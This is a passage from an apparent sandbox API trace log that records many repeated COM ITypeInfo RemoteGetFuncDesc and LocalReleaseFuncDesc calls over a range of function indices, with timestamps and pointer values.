(This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x28, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x29, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x30, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x31, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x32, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x33, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x34, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x35, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x36, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x37, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x38, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.247] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.247] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x39, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x40, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x41, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.248] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x42, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.248] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x43, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.296] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x44, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.296] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x45, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.296] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x46, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.296] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x47, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.296] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x48, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.296] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.296] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x49, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.296] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x50, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x51, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x52, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x53, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x54, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x55, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x56, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x57, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x58, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x59, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.297] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.297] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x60, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x61, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x62, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x63, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x64, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x65, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x66, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x67, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x68, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x69, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x70, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x71, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x72, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.298] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x73, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.298] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x74, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x75, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x76, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x77, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x78, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x79, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7a, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7b, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7c, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7d, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7e, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7f, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x80, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x81, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x82, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x83, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.299] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.299] ITypeInfo:RemoteGetFuncDesc (in: 